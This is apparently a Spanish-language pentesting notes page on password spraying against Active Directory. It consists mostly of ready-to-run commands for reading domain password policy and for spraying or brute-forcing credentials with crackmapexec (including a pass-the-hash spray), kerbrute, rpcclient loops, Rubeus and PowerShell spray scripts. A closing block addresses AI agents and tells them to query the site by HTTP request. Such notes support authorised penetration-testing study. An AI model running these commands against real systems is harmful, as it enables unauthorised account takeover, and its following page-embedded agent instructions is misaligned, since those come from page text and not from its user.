# Password Spraying

Una vez hayamos conseguido varios usuarios validos, podemos crear una wordlist de esos usuarios y utilizar por ejemplo rockyou.txt para cada usuario.

Lista de usuarios que pueden utilizarse para User Enumeration:<https://github.com/insidetrust/statistically-likely-usernames>

## Password policy

Si también tenemos alguna credencial o una shell podemos sacar la política de la password con los siguientes comandos: (sacado de hacktricks)

```
# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10; 
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview
```

## Spraying

Primero pongo las técnicas para Linux.

### Crackmapexec

```
crackmapexec smb 192.168.218.0/24 -u 'allimos' -p 'Password1'
crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
```

### Kerbrute

```
https://github.com/ropnop/kerbrute
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman
```

### Metasploit

Tenemos que utilizar el modulo `scanner/smb/smb_login`

### RCPClient

```
for u in $(cat users.txt); do 
    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done
```

Ahora con Windows:

Utilizando [Rubeus.exe](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe) para hacer bruteforce:

```
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

### Invoke-DomainPasswordSpray

```
Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
```

### Invoke-SprayEmptyPassword.ps1

{% embed url="<https://github.com/S3cur3Th1sSh1t/Creds/blob/master/PowershellScripts/Invoke-SprayEmptyPassword.ps1>" %}

#### Reference

{% embed url="<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/password-spraying>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://j4ckie0x17.gitbook.io/notes-pentesting/windows/metodologia-active-directory/password-spraying.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.